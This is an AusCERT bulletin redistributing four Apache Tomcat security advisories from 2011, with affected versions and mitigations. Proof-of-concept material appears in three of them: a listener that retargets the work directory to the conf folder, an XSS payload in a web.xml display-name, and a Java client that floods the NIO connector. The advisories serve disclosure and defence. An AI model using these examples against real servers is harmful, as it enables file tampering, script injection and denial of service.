Date: 07 February 2011
References: ESB-2011.0164 ESB-2011.0281 ESB-2011.0374 ESB-2011.0549 ESB-2011.0668 ESB-2011.0764 ESB-2011.0796 ESB-2011.1034 ESB-2011.1177 ASB-2012.0008
ESB-2012.0837.2 ESB-2013.0466
Click here for printable version
Click here for PGP verifiable version
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2011.0119
A number of vulnerabilities have been identified in Apache Tomcat
7 February 2011
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Tomcat
Publisher: Apache
Operating System: UNIX variants (UNIX, Linux, OSX)
Windows
Impact/Access: Modify Arbitrary Files -- Remote with User Interaction
Execute Arbitrary Code/Commands -- Remote with User Interaction
Denial of Service -- Remote/Unauthenticated
Resolution: Patch/Upgrade
CVE Names: CVE-2011-0534 CVE-2011-0013 CVE-2010-3718
Comment: This bulletin contains four (4) Apache security advisories.
- --------------------------BEGIN INCLUDED TEXT--------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions
Severity: Low
Vendor: The Apache Software Foundation
Versions Affected:
- - - Tomcat 7.0.0 to 7.0.3
- - - Tomcat 6.0.0 to 6.0.?
- - - Tomcat 5.5.0 to 5.5.?
- - - Earlier, unsupported versions may also be affected
Description:
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContect
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
This vulnerability is only applicable when hosting web applications from
untrusted sources such as shared hosting environments.
Example (AL2 licensed):
Listener source
- - ---------------
package listeners;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
public final class FooListener implements ServletContextListener {
public void contextInitialized(ServletContextEvent event) {
ServletContext context = event.getServletContext();
java.io.File workdir = (java.io.File) context
.getAttribute("javax.servlet.context.tempdir");
if (workdir.toString().indexOf("..") < 0) {
context.setAttribute("javax.servlet.context.tempdir",
new java.io.File(workdir, "../../../../conf"));
}
}
public void contextDestroyed(ServletContextEvent event) {
}
}
web.xml snippet
- - ---------------
<listener>
<listener-class>listeners.FooListener</listener-class>
</listener>
Mitigation:
Users of affected versions should apply one of the following mitigations:
- - - Upgrade to a Tomcat version where this issue is fixed
- - - Undeploy all web applications from untrusted sources
Credit:
The issue was identified by the Tomcat security team.
References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQIcBAEBAgAGBQJNTLBXAAoJEBDAHFovYFnnkQkQAIpE68EHXYnu70xHFThPVGPk
48OIvAA2fMzF8RajaGQRkOS3WXrzPdbjf8AXjUmZ/E3Yr+4XdP2kmDMGsW9hs/Vw
x2fXYfyBQQQMdKVnSVr3cMSPs+RhnSpPI1wsQUWnp0xZNez/9VkSDeINq8JFGXLB
5NgkQZ4+6UBBl2K/mtkVxZHnXi1y9ulvhaQ95jCTt7mzOUJrlq8NXWaEW1njtGAO
7Z6KBMn6PQkzx1k38TG6kPBN331fWWE2WhSimMkX1Q8jfI5f0PVPaQELPKieSf7x
G0zCfQ8aH0q4Kn0jsvvmP43mzCz3PbBwOpFZgPO0vcA5usXwFXGTJCKAhhCTy0CG
q9Sjxb8hLyEwg0vIrvzzlPj6g8mm6syW7Db4R4F3vW/ovCWgVdRFMhl0e/KX3nfG
MWSYq/x4wFj470/j5Ak7wz2y/GAiX9LiEwhFlEWL/SOevY9/u3l9dXIUbcYUG3mS
4dBpthU5eJc2vbdp+gtAPoJexxS9nZhCfbcNjV5HbdRHhn1dIaJhR3KYnqQU2wX2
CG2srHqTJ+3aW969nhHxgpiLmElmDlWHMNQmDDDaY9CDC2i3ZNdw4uBes4nRc7Xg
/1LQvx7pSnAidrQa6CcOjsf4usBQ6faO0zeuri9l6jwFDfwHiL/TuNzNxgmbR8BC
DgZJ/zI6FepuWKA4CV7t
=uz7D
- -----END PGP SIGNATURE-----
- -------------------------------------------------------------------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CVE-2011-0013 Apache Tomcat Manager XSS vulnerability
Severity: Low
Vendor: The Apache Software Foundation
Versions Affected:
- - - Tomcat 7.0.0 to 7.0.5
- - - Tomcat 6.0.0 to 6.0.29
- - - Tomcat 5.5.0 to 5.5.31
- - - Earlier, unsupported versions may also be affected
Description:
The HTML Manager interface displayed web applciation provided data, such
as display names, without filtering. A malicious web application could
trigger script execution by an administartive user when viewing the
manager pages.
Example:
<display-name><script>alert('hi');</script></display-name>
Mitigation:
Users of affected versions should apply one of the following mitigations:
- - - Upgrade to a Tomcat version where this issue is fixed
- - - Undeploy untrusted web applications
- - - Remove the Manager application
Credit:
The issue was identified by the Tomcat security team.
References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQIcBAEBAgAGBQJNTLB+AAoJEBDAHFovYFnnul0P/iupVkfHFjgIN5rkDHVoArfU
MkIcm5GMCqb1d0th8JmEtoFlI09sTJdGwyUbiC4hnuj/lA+BJuW/wDSzM2esfXGX
okraVm1SI6eI5DceQf/QzPZ9FIq3Z8mqixzBX959aQY1+JnW3Ah4vIYvZpaKpyi+
BMIj0JtIVEVNajAnUYQn9ruZg9FFX+t1Ajb6n+CJV3D4ux7XMGLFv2y5XPwVwJXm
AP/0jAHoMbjaRMwHrUxgkIDMpwpOcHFIfFq7zHjo9OTtL2LJ+vrB3FlxV6rZygMt
gwPeDeUoCCphrf1UncUzckW280/WGfsr3xncNEOpCG3o6xQkRV8eoGNikw5xZ2U8
YxLr4RdpJemUhx94jDYiMdT/gYyHbMfHtVsG3VObFp2yEjnLHU7HI6tI3C617nau
Czg1Z/YqnUvZfGDQDL5bXkF6dlWav9CmXuXht7gS3yskkYIJPJn0oZhAYweznK+v
Ua3jqNvsVktsGd76UtRh246Js6ie4EYmusZ3LqJQmsbkoPxkcAFuHCkZqVBR37SF
tt9yI7qUAb+022L+EGQkmjfcy0O9e4WKMXwf5ocywSDVAJH2/EuGTY1vAojHqGNO
hM88fdKus3Vfvj4vqzkAH+4LpdpPmK80xl+KxSJMBg+cWYLe6OGYEL7FbdoswcRv
cNZcMy4fbYmWPQkY+miZ
=sDwq
- -----END PGP SIGNATURE-----
- -------------------------------------------------------------------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CVE-2011-0534 Apache Tomcat DoS vulnerability
Severity: Important
Vendor: The Apache Software Foundation
Versions Affected:
- - - Tomcat 7.0.0 to 7.0.6
- - - Tomcat 6.0.0 to 6.0.30
Description:
Tomcat did not enforce the maxHttpHeaderSize limit while parsing the
request line in the NIO HTTP connector. A specially crafted request
could trigger an DoS via an OutOfMemoryError.
Example (AL2 licensed):
package bug50631;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;
public class FloodClient1 {
static final int k_step = 10;
static byte[] value = new byte[k_step * 1024];
public static void main(String[] args) throws Exception {
int i = 0;
while (i < value.length) {
value[i++] = 13;
}
SocketAddress addr = new InetSocketAddress("localhost", 8080);
Socket socket = new Socket();
socket.setSoTimeout(0);
socket.connect(addr, 0);
OutputStream os = socket.getOutputStream();
// InputStream is = socket.getInputStream();
int k = k_step;
int m = 0;
int k100 = 100;
while (m < 2000) {
if (k >= k100) {
k100 += 100;
System.out.print('.');
System.out.flush();
}
if (k >= 1024) {
m++;
k -= 1024;
k100 = 100;
System.out.println(" " + m + " Mb");
}
os.write(value);
os.flush();
Thread.sleep(1);
k+=k_step;
}
}
}
Mitigation:
Users of affected versions should apply one of the following mitigations
- - - Upgrade to a Tomcat version where this issue is fixed
- - - Use a BIO or AJP HTTP connector in place of an NIO HTTP connector
Credit:
The issue was identified by the Tomcat security team.
References:
https://issues.apache.org/bugzilla/show_bug.cgi?id=50631
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQIcBAEBAgAGBQJNTLBxAAoJEBDAHFovYFnnVFsQAIE5bU+2aJccXjnlYkEZAr4S
aXmHOCqTOzaW5ob3hPhpFmOwZx3Miabx9fJPRGnCb8CEihz00soYbMcTRHbgDqXA
d/bXMr4xjZF80AM/cWng0vmDbgnLbhVUkGwNqLtuU2rjyxfnRNKBkc0CDIoDQ1FV
zkm5uW9DYTpCmcRo13IhCPanY1DRA/+QiUxriofeUPuz6skiUuyBiY95GDQNOvSo
GofEJt39DBnPDb2kzonkQTERo2OgSIPDgLeas3/pawHGsQXaBH3dwOsRQESExJS+
kT5xuhUuqynWNGXnimG0x8yCDe7+SujiAmSjTSrblBIanOtIt3SxjSe9+SasSQih
jNO/M87aQ/znmlIlVeS4F+OFuWSuBUB+GjpZn1L77pG+/yWiHurhUuAXM2borB9c
I45c2yuYstki7ej9buHXpy5l4d6A28FT61V6E2sENM9RMMHFY7cUJmorbsBf1qj2
ei+h9QEcNiwg/on0apg9pU+B1PCZxGR7G/8aMCXFfkri4opeAXy7ZpJfk+k2zI64
S8edezROjZxgztqZKydpFn2MrQ9tUmoioZHUEiZqAuPVfszXvUdLZsSFh+7A6+4D
jL+T7jIt9wsCxsZJ1+8X03nEkD7Yop+kHvUmMjyM4XEKLReI+PoXfYBrNou7Nhvm
niulExg4qtuJplCbEw8k
=06CU
- -----END PGP SIGNATURE-----
- -------------------------------------------------------------------------------
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
The original report is [1].
Tomcat is affected when accessing a form based security constrained
page or any page that calls javax.servlet.ServletRequest.getLocale() or
javax.servlet.ServletRequest.getLocales().
Work-arounds have been implemented in the following versions:
- - - 7.0.8 (released)
- - - 6.0.32 (released)
- - - 5.5.33 (released expected Monday 7 Feb 2011)
All users are recommended to upgrade to a Tomcat version with the
work-around. Users unable to upgrade can filter malicious requests via a
Servlet filter, an httpd re-write rule (if Tomcat is behind an httpd
reverse proxy) or other filtering as available.
Accept-Language headers that are compliant with RFC 2616 can not trigger
this bug. Therefore, filtering out all request with non-compliant
headers will provide protection against the DOS vulnerability.
The Apache Tomcat Security Team
[1]
http://www.exploringbinary.com/java-hangs-when-converting-2-2250738585072012e-308/
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQIcBAEBAgAGBQJNTLBnAAoJEBDAHFovYFnnk0IQAOB6xo9/wEqckNzq/MUxfxH8
c131gJ0XcMktGZ7x7A2/SgG/oIfl5B4q78EujtPwHsy8XS9XRKCdJtOz8Ak67zb7
z6UhB+ha2R0fgzJoesZeBiHyH4vymB8izF9npnDuFv+Gij7K08mu5bERMCNNQftc
+/0a7I2QD/K5YoqkYW/1RLwWhrbAXmjE8ysmnTtgfemRxmGL971bx8+9+l9JmGpm
unP+yVYpKNnGXNUSNuL9C0oka2iCzkrPW0UplZyyMsB2iiuKetYESL9KR1rEvxA6
OL4FmS0OxzyPO0UwXFd6qJxc6L2BaWLdhyu7Qp/WnWDFsPDdGa7J87i4WeMsNb2D
GYk+9TNV4S2QOCK1dFuARvCY74QykuthBEUHmCJUOT5fUt3NtGXjMTvBTWZUGIbg
Eqe5nfGxLB2ZcimWoYUKoYJe31/DY8lBFVPl4KVIUlcQ0RLjnE7JqbSey8ZrHZ4o
FY9ZA74ndDUjEaJpwgRVHN6FO7Sts+wDPATYZVvO3lPb0pzwGTBFPAcSiysqbiJT
njwUBWfz5e7cpXpHvCPyh0PGY6giHticXplhKsq9M/ZK1G6ZzFXbBwlACUfLGFK7
Pt4af26arAlcoapJ0PG8AXGPZLztzLVR1jaNBJ9900gIZ/OI5cmZ9n23l0viTtEf
v/8kgZ+3uv6vRb3+wrXH
=oxMp
- -----END PGP SIGNATURE-----
- ---------------------------------------------------------------------
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
http://www.auscert.org.au/render.html?cid=1980
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iD8DBQFNTzV1/iFOrG6YcBERAi1lAJsEXmLWyLQFsYSGWk0uApaVlpbqGgCcDQJK
ouwsLhvqzC2JD7Z80+w/yH4=
=2GvM
-----END PGP SIGNATURE-----
|